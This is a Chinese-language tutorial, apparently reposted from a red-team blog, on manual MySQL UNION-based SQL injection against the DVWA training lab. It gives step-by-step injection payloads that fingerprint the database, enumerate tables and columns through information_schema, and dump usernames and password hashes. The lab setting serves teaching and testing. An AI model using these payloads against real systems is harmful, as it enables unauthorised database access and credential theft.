MySQL⼿注之联合查询注⼊详解

释放双眼,带上耳机,听听看~!
【文章标题:MySQL⼿注之联合查询注⼊详解 】
【作者:PowerLiu】
【来源公众号:saulGoodman】
【发布者:BUGFOR安全团队-安全行业公众号监测系统】


以下正文:
注:文章不配图


MySQL⼿注之联合查询注⼊详解
原创 PowerLiu saulGoodman
今天
saulGoodman
一个专注于红队攻防研究的公众号
关注
MySQL⼿注之联合查询注⼊详解

MySQL联合查询注入原理
union select 联合查询,即合并(取交集,结果中没有重复⾏)前后两个查询;前提是前后查询视图必须拥有相同数量的列,列也必需拥有相同的数据类型。
Union联合查询注入基本流程
1、判断是否存在注入
方法一:单引号法
注入点'
方法二:逻辑法
and 1=1
and 1=2
1' and '1'='1
1' and '1'='2
方法三:运算法
-1
-0
2、猜解表名
常见的表名:
admin
user
admin_user
system
3、猜解字段数
order by xx
4、猜解字段名
常见的字段名:
username
password
user
pass
5、获取数据
union select 1,2,3... from 表名
MySQL手注之联合查询注入详解

测试环境:dvwa
注入点:http://127.0.0.1/dvwa/vulnerabilities/sqli/
靶场注入语句:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
1、判断是否注入
我们可以判断是否存在注入:
判断注入语句:
1' and '1'='1
这样我们的 and 就逃逸出来了(为了闭合):
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' and '1'='1';";
1' and '1'='1 返回正常!
判断注入语句:
1' and '1'='2
这样我们的 and 就逃逸出来了(为了闭合):
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' and '1'='2';";
1' and '1'='2 返回不正常说明存在注入!很显然这是一个`字符型`注入!因为它用引号包裹起来了!
PS:字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。
2、猜解字段数
注入的语句:
1' order by 1#
带入进查询就是这样的:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#';";
注释:# 就是注释后面的内容,这样我们的 order by 就逃逸出来了!
我们先 order by 3 发现错误:
1' order by 3#
order by 2 发现正常:
1' order by 2#
说明字段数有2个!
3、联合查询
获取当前数据库和数据库用户名:
注入语句:
1' union select database(),user() #
带到数据库执行就是:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user() #';";

注释:
 database()  是一个mysql的函数,意思是查询当前数据库名
 user() 意思是查询当前数据库的用户名
查询出来发现当前数据库名是:dvwa,数据库用户名是 root !
获取当前的数据库版本和操作系统:
注入语句:
1' union select version(),@@version_compile_os #
带到数据库执行就是:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os #';";

注释:
version() 是一个函数,意思是查询当前数据库的版本信息
@@version_compile_os 是一个函数,意思是查询操作系统信息
有上图可见,我们的MySQL数据库版本为:5.5.53,而我们的操作系统信息是win32,说明是windows操作系统!
为什么要获取MySQL的版本?
因为当MySQL的版本⼩于4.0时,是不⽀持union select联合查询的;当MySQL版本⼤于 5.0时,有个默认数据库information_schema,保存了 Mysql服务器所有数据库的信息,如数据库名,数据库的表, 表栏的数据类型与访问权限等。该数据库拥有⼀个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。
4、获取表名
因为我们查询出来了MySQL的版本是大于5.0的,那么我们就可以利用联合查询 union select 来对他的数据库下的表名进行查询!
注入语句:
1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#
带入数据库查询执行就是:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#';";

注释:
information_schema.tables  information_schema下的tables的数据表包含了两个字段:tables_name、tables_schema,分别记录dbms中的存储的表名所在的数据库
 where table_schema= 'dvwa'  这里使用了where条件语句指定了查询的数据库名为:dvwa
 总的语句的意思就是,查询dvwa这个数据库名下的所有表名
由上图可见,我们查询出来 dvwa 数据库下有两个表:guestbook、users 两张表!很显然我们的敏感信息就在 users 这张表里!
5、获取表中的列名
我们得到的信息有,数据库名:dvwa,表名:users,接下来就查表users下的列名:
注入语句:
 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
带入数据库查询执行就是:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = ' 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #';";

注释:
group_concat(column_name)  group_concat()这个函数是吧所有的信息一次性列举出来,返回一个字符串结果!而他里面的column_name就是我们所有列名
information_schema.columns  这个表里存放的是我们数据库中所有的列名信息
where table_name='users'  使用where条件来指定我们要获取users表下的列
由上图可见,我们得到了所有的列名:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
其中铭感的列名就是 user、password,我们就查询他们两个列名下的数据!
6、获取数据
到了最后一步,我们得到的信息有:数据库名:dvwa、表名:users、列名:user、passoword
这个时候我们就可以来使用联合查询 union select 来查询 user 、 password 列里的数据了!
注入语句:
1' union select user,password from users#
带入数据库查询执行就是:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#';";

注释:
union select  将多个select的语句的结果合并到一个结果集中里!因为我们注入语句前面就已经是一个查询语句了:SELECT first_name, last_name FROM users WHERE user_id =,而我们使用 union select 就可以吧前面和后面的SQL语句合并为一个SQL语句来进行查询!
由上图可见,我们获取到了他们的账号和加密的密码!至此MySQL手工注入之联合查询就到此为止!

注意:版权归原作者所有!
如有侵权请立即与我们联系,我们将及时处。
WEB安全安全工具安全独秀圈安全管理

使用Portainer管理Vulhub

2020-4-14 15:06:12

公众号文章

沙特移动技术“武器化”:利用SS7协议漏洞进行规模化间谍活动

2020-4-5 19:46:04

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索